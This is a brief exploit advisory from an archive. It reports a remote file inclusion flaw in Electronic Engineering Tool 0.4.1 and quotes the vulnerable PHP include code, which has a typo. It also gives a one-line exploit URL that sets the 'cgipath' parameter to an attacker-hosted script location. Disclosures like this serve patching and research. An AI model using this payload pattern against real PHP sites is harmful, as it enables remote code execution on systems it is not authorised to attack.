id: 1078
date: 10/27/2006
title: Electronic Engineering Tool (EE TOOL) <= 0.4.1 File Include Vulnerability
author: xoron
cves: 

=========================================================================
Electronic Engineering Tool (EE TOOL) <= 0.4.1 File Include Vulnerability
=========================================================================



 
Code: if($type == 1) { $url = "$cgipath" . "ipcalc.cgi"; } else {
$url = "$cgipath" . "ipcalc.cgi?host=$host&mask1=$mask1&mask2=$mask2";
}nclude("$url");
 
Exploit:www.target.com/ip.inc.php?type=1&cgipath=evilscripts
 
Found: Cyber-Security
 
Thanx: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide



#  0day.today [2023-03-23]  #